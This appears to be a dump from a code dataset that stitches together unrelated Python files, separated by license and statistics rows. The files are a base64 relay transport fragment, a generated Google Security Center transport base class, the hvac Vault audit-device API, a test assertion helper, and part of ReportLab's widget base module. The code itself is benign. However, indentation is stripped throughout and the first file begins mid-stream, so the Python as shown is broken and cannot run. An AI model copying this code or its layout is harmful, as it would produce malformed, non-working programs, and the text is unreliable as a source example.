# split it into multiple chunks.
b64_chunks = _get_b64_chunks_from_str(data.peek())
        # Now b64-decode each chunk and append it to our decoded data.
for chunk in b64_chunks:
try:
decoded_data += base64.b64decode(chunk)
except TypeError:
log.info("We got corrupted b64 ('%s')." % chunk)
return
data.drain()
self.circuit.upstream.write(decoded_data)
def receivedUpstream(self, data):
"""
Got data from upstream; relay them downstream.
"""
self.circuit.downstream.write(base64.b64encode(data.read()))
return
class B64Client(B64Transport):
pass
class B64Server(B64Transport):
pass
| bsd-3-clause | 6,540,606,080,512,612,000 | 25.978022 | 82 | 0.606517 | false |
googleapis/googleapis-gen | google/cloud/securitycenter/v1p1beta1/securitycenter-v1p1beta1-py/google/cloud/securitycenter_v1p1beta1/services/security_center/transports/base.py | 1 | 22937 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.securitycenter_v1p1beta1.types import finding
from google.cloud.securitycenter_v1p1beta1.types import finding as gcs_finding
from google.cloud.securitycenter_v1p1beta1.types import notification_config
from google.cloud.securitycenter_v1p1beta1.types import notification_config as gcs_notification_config
from google.cloud.securitycenter_v1p1beta1.types import organization_settings
from google.cloud.securitycenter_v1p1beta1.types import organization_settings as gcs_organization_settings
from google.cloud.securitycenter_v1p1beta1.types import security_marks as gcs_security_marks
from google.cloud.securitycenter_v1p1beta1.types import securitycenter_service
from google.cloud.securitycenter_v1p1beta1.types import source
from google.cloud.securitycenter_v1p1beta1.types import source as gcs_source
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.longrunning import operations_pb2 # type: ignore
from google.protobuf import empty_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
'google-cloud-securitycenter',
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class SecurityCenterTransport(abc.ABC):
"""Abstract transport class for SecurityCenter."""
AUTH_SCOPES = (
'https://www.googleapis.com/auth/cloud-platform',
)
DEFAULT_HOST: str = 'securitycenter.googleapis.com'
def __init__(
self, *,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ':' not in host:
host += ':443'
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs("'credentials_file' and 'credentials' are mutually exclusive")
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file,
**scopes_kwargs,
quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(**scopes_kwargs, quota_project_id=quota_project_id)
# If the credentials is service account credentials, then always try to use self signed JWT.
if always_use_jwt_access and isinstance(credentials, service_account.Credentials) and hasattr(service_account.Credentials, "with_always_use_jwt_access"):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(cls, host: str, scopes: Optional[Sequence[str]]) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
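    # For example, with google-auth >= 1.25.0 the returned kwargs are
    # {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}; older versions
    # only receive {"scopes": scopes or cls.AUTH_SCOPES}.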
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.create_source: gapic_v1.method.wrap_method(
self.create_source,
default_timeout=60.0,
client_info=client_info,
),
self.create_finding: gapic_v1.method.wrap_method(
self.create_finding,
default_timeout=60.0,
client_info=client_info,
),
self.create_notification_config: gapic_v1.method.wrap_method(
self.create_notification_config,
default_timeout=60.0,
client_info=client_info,
),
self.delete_notification_config: gapic_v1.method.wrap_method(
self.delete_notification_config,
default_timeout=60.0,
client_info=client_info,
),
self.get_iam_policy: gapic_v1.method.wrap_method(
self.get_iam_policy,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.get_notification_config: gapic_v1.method.wrap_method(
self.get_notification_config,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.get_organization_settings: gapic_v1.method.wrap_method(
self.get_organization_settings,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.get_source: gapic_v1.method.wrap_method(
self.get_source,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.group_assets: gapic_v1.method.wrap_method(
self.group_assets,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=480.0,
),
default_timeout=480.0,
client_info=client_info,
),
self.group_findings: gapic_v1.method.wrap_method(
self.group_findings,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=480.0,
),
default_timeout=480.0,
client_info=client_info,
),
self.list_assets: gapic_v1.method.wrap_method(
self.list_assets,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=480.0,
),
default_timeout=480.0,
client_info=client_info,
),
self.list_findings: gapic_v1.method.wrap_method(
self.list_findings,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=480.0,
),
default_timeout=480.0,
client_info=client_info,
),
self.list_notification_configs: gapic_v1.method.wrap_method(
self.list_notification_configs,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.list_sources: gapic_v1.method.wrap_method(
self.list_sources,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.run_asset_discovery: gapic_v1.method.wrap_method(
self.run_asset_discovery,
default_timeout=60.0,
client_info=client_info,
),
self.set_finding_state: gapic_v1.method.wrap_method(
self.set_finding_state,
default_timeout=60.0,
client_info=client_info,
),
self.set_iam_policy: gapic_v1.method.wrap_method(
self.set_iam_policy,
default_timeout=60.0,
client_info=client_info,
),
self.test_iam_permissions: gapic_v1.method.wrap_method(
self.test_iam_permissions,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.update_finding: gapic_v1.method.wrap_method(
self.update_finding,
default_timeout=60.0,
client_info=client_info,
),
self.update_notification_config: gapic_v1.method.wrap_method(
self.update_notification_config,
default_timeout=60.0,
client_info=client_info,
),
self.update_organization_settings: gapic_v1.method.wrap_method(
self.update_organization_settings,
default_timeout=60.0,
client_info=client_info,
),
self.update_source: gapic_v1.method.wrap_method(
self.update_source,
default_timeout=60.0,
client_info=client_info,
),
self.update_security_marks: gapic_v1.method.wrap_method(
self.update_security_marks,
default_timeout=480.0,
client_info=client_info,
),
}
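    # Note: the wrappers above attach per-RPC retry and timeout policies;
    # e.g. get_iam_policy retries DeadlineExceeded and ServiceUnavailable
    # errors with exponential backoff (initial 0.1s, multiplier 1.3, delays
    # capped at 60s) under a 60-second overall deadline.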
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Return the client designed to process long-running operations."""
raise NotImplementedError()
@property
def create_source(self) -> Callable[
[securitycenter_service.CreateSourceRequest],
Union[
gcs_source.Source,
Awaitable[gcs_source.Source]
]]:
raise NotImplementedError()
@property
def create_finding(self) -> Callable[
[securitycenter_service.CreateFindingRequest],
Union[
gcs_finding.Finding,
Awaitable[gcs_finding.Finding]
]]:
raise NotImplementedError()
@property
def create_notification_config(self) -> Callable[
[securitycenter_service.CreateNotificationConfigRequest],
Union[
gcs_notification_config.NotificationConfig,
Awaitable[gcs_notification_config.NotificationConfig]
]]:
raise NotImplementedError()
@property
def delete_notification_config(self) -> Callable[
[securitycenter_service.DeleteNotificationConfigRequest],
Union[
empty_pb2.Empty,
Awaitable[empty_pb2.Empty]
]]:
raise NotImplementedError()
@property
def get_iam_policy(self) -> Callable[
[iam_policy_pb2.GetIamPolicyRequest],
Union[
policy_pb2.Policy,
Awaitable[policy_pb2.Policy]
]]:
raise NotImplementedError()
@property
def get_notification_config(self) -> Callable[
[securitycenter_service.GetNotificationConfigRequest],
Union[
notification_config.NotificationConfig,
Awaitable[notification_config.NotificationConfig]
]]:
raise NotImplementedError()
@property
def get_organization_settings(self) -> Callable[
[securitycenter_service.GetOrganizationSettingsRequest],
Union[
organization_settings.OrganizationSettings,
Awaitable[organization_settings.OrganizationSettings]
]]:
raise NotImplementedError()
@property
def get_source(self) -> Callable[
[securitycenter_service.GetSourceRequest],
Union[
source.Source,
Awaitable[source.Source]
]]:
raise NotImplementedError()
@property
def group_assets(self) -> Callable[
[securitycenter_service.GroupAssetsRequest],
Union[
securitycenter_service.GroupAssetsResponse,
Awaitable[securitycenter_service.GroupAssetsResponse]
]]:
raise NotImplementedError()
@property
def group_findings(self) -> Callable[
[securitycenter_service.GroupFindingsRequest],
Union[
securitycenter_service.GroupFindingsResponse,
Awaitable[securitycenter_service.GroupFindingsResponse]
]]:
raise NotImplementedError()
@property
def list_assets(self) -> Callable[
[securitycenter_service.ListAssetsRequest],
Union[
securitycenter_service.ListAssetsResponse,
Awaitable[securitycenter_service.ListAssetsResponse]
]]:
raise NotImplementedError()
@property
def list_findings(self) -> Callable[
[securitycenter_service.ListFindingsRequest],
Union[
securitycenter_service.ListFindingsResponse,
Awaitable[securitycenter_service.ListFindingsResponse]
]]:
raise NotImplementedError()
@property
def list_notification_configs(self) -> Callable[
[securitycenter_service.ListNotificationConfigsRequest],
Union[
securitycenter_service.ListNotificationConfigsResponse,
Awaitable[securitycenter_service.ListNotificationConfigsResponse]
]]:
raise NotImplementedError()
@property
def list_sources(self) -> Callable[
[securitycenter_service.ListSourcesRequest],
Union[
securitycenter_service.ListSourcesResponse,
Awaitable[securitycenter_service.ListSourcesResponse]
]]:
raise NotImplementedError()
@property
def run_asset_discovery(self) -> Callable[
[securitycenter_service.RunAssetDiscoveryRequest],
Union[
operations_pb2.Operation,
Awaitable[operations_pb2.Operation]
]]:
raise NotImplementedError()
@property
def set_finding_state(self) -> Callable[
[securitycenter_service.SetFindingStateRequest],
Union[
finding.Finding,
Awaitable[finding.Finding]
]]:
raise NotImplementedError()
@property
def set_iam_policy(self) -> Callable[
[iam_policy_pb2.SetIamPolicyRequest],
Union[
policy_pb2.Policy,
Awaitable[policy_pb2.Policy]
]]:
raise NotImplementedError()
@property
def test_iam_permissions(self) -> Callable[
[iam_policy_pb2.TestIamPermissionsRequest],
Union[
iam_policy_pb2.TestIamPermissionsResponse,
Awaitable[iam_policy_pb2.TestIamPermissionsResponse]
]]:
raise NotImplementedError()
@property
def update_finding(self) -> Callable[
[securitycenter_service.UpdateFindingRequest],
Union[
gcs_finding.Finding,
Awaitable[gcs_finding.Finding]
]]:
raise NotImplementedError()
@property
def update_notification_config(self) -> Callable[
[securitycenter_service.UpdateNotificationConfigRequest],
Union[
gcs_notification_config.NotificationConfig,
Awaitable[gcs_notification_config.NotificationConfig]
]]:
raise NotImplementedError()
@property
def update_organization_settings(self) -> Callable[
[securitycenter_service.UpdateOrganizationSettingsRequest],
Union[
gcs_organization_settings.OrganizationSettings,
Awaitable[gcs_organization_settings.OrganizationSettings]
]]:
raise NotImplementedError()
@property
def update_source(self) -> Callable[
[securitycenter_service.UpdateSourceRequest],
Union[
gcs_source.Source,
Awaitable[gcs_source.Source]
]]:
raise NotImplementedError()
@property
def update_security_marks(self) -> Callable[
[securitycenter_service.UpdateSecurityMarksRequest],
Union[
gcs_security_marks.SecurityMarks,
Awaitable[gcs_security_marks.SecurityMarks]
]]:
raise NotImplementedError()
__all__ = (
'SecurityCenterTransport',
)
| apache-2.0 | 3,579,657,692,665,785,300 | 39.09965 | 161 | 0.582857 | false |
ianunruh/hvac | hvac/api/system_backend/audit.py | 1 | 3598 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Support for "Audit"-related System Backend Methods."""
from hvac.api.system_backend.system_backend_mixin import SystemBackendMixin
class Audit(SystemBackendMixin):
def list_enabled_audit_devices(self):
"""List enabled audit devices.
It does not list all available audit devices.
This endpoint requires sudo capability in addition to any path-specific capabilities.
Supported methods:
GET: /sys/audit. Produces: 200 application/json
:return: JSON response of the request.
:rtype: dict
"""
list_audit_devices_response = self._adapter.get('/v1/sys/audit').json()
return list_audit_devices_response
def enable_audit_device(self, device_type, description=None, options=None, path=None):
"""Enable a new audit device at the supplied path.
The path can be a single word name or a more complex, nested path.
Supported methods:
PUT: /sys/audit/{path}. Produces: 204 (empty body)
:param device_type: Specifies the type of the audit device.
:type device_type: str | unicode
:param description: Human-friendly description of the audit device.
:type description: str | unicode
:param options: Configuration options to pass to the audit device itself. This is
dependent on the audit device type.
:type options: str | unicode
:param path: Specifies the path in which to enable the audit device. This is part of
the request URL.
:type path: str | unicode
:return: The response of the request.
:rtype: requests.Response
"""
if path is None:
path = device_type
params = {
'type': device_type,
'description': description,
'options': options,
}
api_path = '/v1/sys/audit/{path}'.format(path=path)
return self._adapter.post(
url=api_path,
json=params
)
def disable_audit_device(self, path):
"""Disable the audit device at the given path.
Supported methods:
DELETE: /sys/audit/{path}. Produces: 204 (empty body)
:param path: The path of the audit device to delete. This is part of the request URL.
:type path: str | unicode
:return: The response of the request.
:rtype: requests.Response
"""
api_path = '/v1/sys/audit/{path}'.format(path=path)
return self._adapter.delete(
url=api_path,
)
def calculate_hash(self, path, input_to_hash):
"""Hash the given input data with the specified audit device's hash function and salt.
This endpoint can be used to discover whether a given plaintext string (the input parameter) appears in the
audit log in obfuscated form.
Supported methods:
        POST: /sys/audit-hash/{path}. Produces: 200 application/json
:param path: The path of the audit device to generate hashes for. This is part of the request URL.
:type path: str | unicode
:param input_to_hash: The input string to hash.
:type input_to_hash: str | unicode
:return: The JSON response of the request.
        :rtype: dict
"""
params = {
'input': input_to_hash,
}
api_path = '/v1/sys/audit-hash/{path}'.format(path=path)
response = self._adapter.post(
url=api_path,
json=params
)
return response.json()
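# Illustrative usage (assumes an authenticated hvac.Client whose `sys`
# attribute mixes in this class; device type, path and options are example
# values only):
#     client.sys.enable_audit_device('file', options={'file_path': '/var/log/vault_audit.log'})
#     client.sys.list_enabled_audit_devices()
#     client.sys.calculate_hash('file', 'some-plaintext-value')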
| apache-2.0 | 181,234,886,285,527,170 | 34.27451 | 115 | 0.611451 | false |
Melrok/energistream-py | tests/verify.py | 1 | 1840 | #would like to use difflib here eventually
hashLine = ('#' * 80) + '\n'
class Verify(object):
def str_equal(self, expected, actual, errMessage=None):
        if expected == actual:
return
if expected is None:
raise AssertionError("{0} expected is None".format(errMessage))
if actual is None:
raise AssertionError("{0} actual is None".format(errMessage))
return self.equal(str(expected), str(actual), errMessage)
def equal(self, expected, actual, err_message=None):
if expected == actual:
return
if type(expected) != type(actual):
message = '\n' + hashLine
message += '\tType mismatch, expected type "{0}"\n\tactually "{1}"'.format(str(type(expected)), str(type(actual)))
message += '\n' + hashLine
raise AssertionError(message)
if err_message is not None:
message = '{0} \n'.format(err_message)
else:
message = '\n'
message += hashLine
message += '\texpected "{0}"\n\tactually "{1}"'.format(str(expected), str(actual))
message += '\n' + hashLine
raise AssertionError(message)
def str_in(self, container, contained, err_message=None):
if err_message is not None:
message = '{0} \n'.format(err_message)
else:
message = '\n'
if container is None:
raise AssertionError("{0} container is None".format(message))
if contained is None:
raise AssertionError("{0} contained is None".format(message))
if contained in container:
return
message += hashLine
message += '\texpected:\t"{0}" \n\tin:\t\t"{1}"'.format(contained, container)
message += '\n' + hashLine
raise AssertionError(message)
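# Illustrative usage (hypothetical test code):
#     v = Verify()
#     v.equal(4, 2 + 2, "simple arithmetic")
#     v.str_in("energistream", "stream", "substring check")
#     v.str_equal(42, "42")   # falls back to comparing str() of both values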
| mit | 895,279,386,831,197,200 | 33.716981 | 126 | 0.573913 | false |
tschalch/pyTray | src/lib/reportlab/graphics/widgetbase.py | 1 | 17565 | #Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/graphics/widgetbase.py
__version__=''' $Id: widgetbase.py,v 1.1 2006/05/26 19:19:38 thomas Exp $ '''
import string
from reportlab.graphics import shapes
from reportlab import rl_config
from reportlab.lib import colors
from reportlab.lib.validators import *
from reportlab.lib.attrmap import *
class PropHolder:
'''Base for property holders'''
_attrMap = None
def verify(self):
"""If the _attrMap attribute is not None, this
checks all expected attributes are present; no
unwanted attributes are present; and (if a
checking function is found) checks each
attribute has a valid value. Either succeeds
or raises an informative exception.
"""
if self._attrMap is not None:
for key in self.__dict__.keys():
if key[0] <> '_':
msg = "Unexpected attribute %s found in %s" % (key, self)
assert self._attrMap.has_key(key), msg
for (attr, metavalue) in self._attrMap.items():
msg = "Missing attribute %s from %s" % (attr, self)
assert hasattr(self, attr), msg
value = getattr(self, attr)
args = (value, attr, self.__class__.__name__)
assert metavalue.validate(value), "Invalid value %s for attribute %s in class %s" % args
if rl_config.shapeChecking:
"""This adds the ability to check every attribute assignment
as it is made. It slows down shapes but is a big help when
developing. It does not get defined if rl_config.shapeChecking = 0.
"""
def __setattr__(self, name, value):
"""By default we verify. This could be off
in some parallel base classes."""
validateSetattr(self,name,value)
def getProperties(self,recur=1):
"""Returns a list of all properties which can be edited and
which are not marked as private. This may include 'child
widgets' or 'primitive shapes'. You are free to override
this and provide alternative implementations; the default
one simply returns everything without a leading underscore.
"""
from reportlab.lib.validators import isValidChild
# TODO when we need it, but not before -
# expose sequence contents?
props = {}
for name in self.__dict__.keys():
if name[0:1] <> '_':
component = getattr(self, name)
if recur and isValidChild(component):
# child object, get its properties too
childProps = component.getProperties(recur=recur)
for (childKey, childValue) in childProps.items():
#key might be something indexed like '[2].fillColor'
#or simple like 'fillColor'; in the former case we
#don't need a '.' between me and my child.
if childKey[0] == '[':
props['%s%s' % (name, childKey)] = childValue
else:
props['%s.%s' % (name, childKey)] = childValue
else:
props[name] = component
return props
def setProperties(self, propDict):
"""Permits bulk setting of properties. These may include
child objects e.g. "chart.legend.width = 200".
All assignments will be validated by the object as if they
were set individually in python code.
All properties of a top-level object are guaranteed to be
set before any of the children, which may be helpful to
widget designers.
"""
childPropDicts = {}
for (name, value) in propDict.items():
parts = string.split(name, '.', 1)
if len(parts) == 1:
#simple attribute, set it now
setattr(self, name, value)
else:
(childName, remains) = parts
try:
childPropDicts[childName][remains] = value
except KeyError:
childPropDicts[childName] = {remains: value}
# now assign to children
for (childName, childPropDict) in childPropDicts.items():
child = getattr(self, childName)
child.setProperties(childPropDict)
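    # Example (hypothetical chart object): dotted names address child objects,
    # so chart.setProperties({'strokeColor': colors.red, 'legend.dx': 10})
    # sets chart.strokeColor directly and dx on the chart.legend child.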
def dumpProperties(self, prefix=""):
"""Convenience. Lists them on standard output. You
may provide a prefix - mostly helps to generate code
samples for documentation.
"""
propList = self.getProperties().items()
propList.sort()
if prefix:
prefix = prefix + '.'
for (name, value) in propList:
print '%s%s = %s' % (prefix, name, value)
class Widget(PropHolder, shapes.UserNode):
"""Base for all user-defined widgets. Keep as simple as possible. Does
not inherit from Shape so that we can rewrite shapes without breaking
widgets and vice versa."""
def _setKeywords(self,**kw):
for k,v in kw.items():
if not self.__dict__.has_key(k):
setattr(self,k,v)
def draw(self):
msg = "draw() must be implemented for each Widget!"
raise shapes.NotImplementedError, msg
def demo(self):
msg = "demo() must be implemented for each Widget!"
raise shapes.NotImplementedError, msg
def provideNode(self):
return self.draw()
def getBounds(self):
"Return outer boundary as x1,y1,x2,y2. Can be overridden for efficiency"
return self.draw().getBounds()
_ItemWrapper={}
class TypedPropertyCollection(PropHolder):
"""A container with properties for objects of the same kind.
This makes it easy to create lists of objects. You initialize
it with a class of what it is to contain, and that is all you
can add to it. You can assign properties to the collection
as a whole, or to a numeric index within it; if so it creates
a new child object to hold that data.
So:
wedges = TypedPropertyCollection(WedgeProperties)
wedges.strokeWidth = 2 # applies to all
wedges.strokeColor = colors.red # applies to all
wedges[3].strokeColor = colors.blue # only to one
The last line should be taken as a prescription of how to
create wedge no. 3 if one is needed; no error is raised if
there are only two data points.
"""
def __init__(self, exampleClass):
#give it same validation rules as what it holds
self.__dict__['_value'] = exampleClass()
self.__dict__['_children'] = {}
def __getitem__(self, index):
try:
return self._children[index]
except KeyError:
Klass = self._value.__class__
if _ItemWrapper.has_key(Klass):
WKlass = _ItemWrapper[Klass]
else:
class WKlass(Klass):
def __getattr__(self,name):
try:
return self.__class__.__bases__[0].__getattr__(self,name)
except:
if self._index and self._parent._children.has_key(self._index):
if self._parent._children[self._index].__dict__.has_key(name):
return getattr(self._parent._children[self._index],name)
return getattr(self._parent,name)
_ItemWrapper[Klass] = WKlass
child = WKlass()
child._parent = self
if type(index) in (type(()),type([])):
index = tuple(index)
if len(index)>1:
child._index = tuple(index[:-1])
else:
child._index = None
else:
child._index = None
for i in filter(lambda x,K=child.__dict__.keys(): x in K,child._attrMap.keys()):
del child.__dict__[i]
self._children[index] = child
return child
def has_key(self,key):
if type(key) in (type(()),type([])): key = tuple(key)
return self._children.has_key(key)
def __setitem__(self, key, value):
msg = "This collection can only hold objects of type %s" % self._value.__class__.__name__
assert isinstance(value, self._value.__class__), msg
def __len__(self):
return len(self._children.keys())
def getProperties(self,recur=1):
# return any children which are defined and whatever
# differs from the parent
props = {}
for (key, value) in self._value.getProperties(recur=recur).items():
props['%s' % key] = value
for idx in self._children.keys():
childProps = self._children[idx].getProperties(recur=recur)
for (key, value) in childProps.items():
if not hasattr(self,key) or getattr(self, key)<>value:
newKey = '[%s].%s' % (idx, key)
props[newKey] = value
return props
def setVector(self,**kw):
for name, value in kw.items():
for i in xrange(len(value)):
setattr(self[i],name,value[i])
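    # Example: wedges.setVector(fillColor=(colors.blue, colors.green, colors.white))
    # assigns wedges[0].fillColor, wedges[1].fillColor and wedges[2].fillColor
    # in order (the test() function below uses exactly this call).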
def __getattr__(self,name):
return getattr(self._value,name)
def __setattr__(self,name,value):
return setattr(self._value,name,value)
## No longer needed!
class StyleProperties(PropHolder):
"""A container class for attributes used in charts and legends.
Attributes contained can be those for any graphical element
(shape?) in the ReportLab graphics package. The idea for this
container class is to be useful in combination with legends
and/or the individual appearance of data series in charts.
A legend could be as simple as a wrapper around a list of style
properties, where the 'desc' attribute contains a descriptive
string and the rest could be used by the legend e.g. to draw
something like a color swatch. The graphical presentation of
the legend would be its own business, though.
A chart could be inspecting a legend or, more directly, a list
of style properties to pick individual attributes that it knows
about in order to render a particular row of the data. A bar
chart e.g. could simply use 'strokeColor' and 'fillColor' for
drawing the bars while a line chart could also use additional
ones like strokeWidth.
"""
_attrMap = AttrMap(
strokeWidth = AttrMapValue(isNumber),
strokeLineCap = AttrMapValue(isNumber),
strokeLineJoin = AttrMapValue(isNumber),
strokeMiterLimit = AttrMapValue(None),
strokeDashArray = AttrMapValue(isListOfNumbersOrNone),
strokeOpacity = AttrMapValue(isNumber),
strokeColor = AttrMapValue(isColorOrNone),
fillColor = AttrMapValue(isColorOrNone),
desc = AttrMapValue(isString),
)
def __init__(self, **kwargs):
"Initialize with attributes if any."
for k, v in kwargs.items():
setattr(self, k, v)
def __setattr__(self, name, value):
"Verify attribute name and value, before setting it."
validateSetattr(self,name,value)
class TwoCircles(Widget):
def __init__(self):
self.leftCircle = shapes.Circle(100,100,20, fillColor=colors.red)
self.rightCircle = shapes.Circle(300,100,20, fillColor=colors.red)
def draw(self):
return shapes.Group(self.leftCircle, self.rightCircle)
class Face(Widget):
"""This draws a face with two eyes.
It exposes a couple of properties
to configure itself and hides all other details.
"""
_attrMap = AttrMap(
x = AttrMapValue(isNumber),
y = AttrMapValue(isNumber),
size = AttrMapValue(isNumber),
skinColor = AttrMapValue(isColorOrNone),
eyeColor = AttrMapValue(isColorOrNone),
mood = AttrMapValue(OneOf('happy','sad','ok')),
)
def __init__(self):
self.x = 10
self.y = 10
self.size = 80
self.skinColor = None
self.eyeColor = colors.blue
self.mood = 'happy'
def demo(self):
pass
def draw(self):
s = self.size # abbreviate as we will use this a lot
g = shapes.Group()
g.transform = [1,0,0,1,self.x, self.y]
# background
g.add(shapes.Circle(s * 0.5, s * 0.5, s * 0.5, fillColor=self.skinColor))
# left eye
g.add(shapes.Circle(s * 0.35, s * 0.65, s * 0.1, fillColor=colors.white))
g.add(shapes.Circle(s * 0.35, s * 0.65, s * 0.05, fillColor=self.eyeColor))
# right eye
g.add(shapes.Circle(s * 0.65, s * 0.65, s * 0.1, fillColor=colors.white))
g.add(shapes.Circle(s * 0.65, s * 0.65, s * 0.05, fillColor=self.eyeColor))
# nose
g.add(shapes.Polygon(
points=[s * 0.5, s * 0.6, s * 0.4, s * 0.3, s * 0.6, s * 0.3],
fillColor=None))
# mouth
if self.mood == 'happy':
offset = -0.05
elif self.mood == 'sad':
offset = +0.05
else:
offset = 0
g.add(shapes.Polygon(
points = [
s * 0.3, s * 0.2, #left of mouth
s * 0.7, s * 0.2, #right of mouth
s * 0.6, s * (0.2 + offset), # the bit going up or down
s * 0.4, s * (0.2 + offset) # the bit going up or down
],
fillColor = colors.pink,
strokeColor = colors.red,
strokeWidth = s * 0.03
))
return g
class TwoFaces(Widget):
def __init__(self):
self.faceOne = Face()
self.faceOne.mood = "happy"
self.faceTwo = Face()
self.faceTwo.x = 100
self.faceTwo.mood = "sad"
def draw(self):
"""Just return a group"""
return shapes.Group(self.faceOne, self.faceTwo)
def demo(self):
"""The default case already looks good enough,
no implementation needed here"""
pass
class Sizer(Widget):
"Container to show size of all enclosed objects"
_attrMap = AttrMap(BASE=shapes.SolidShape,
contents = AttrMapValue(isListOfShapes,desc="Contained drawable elements"),
)
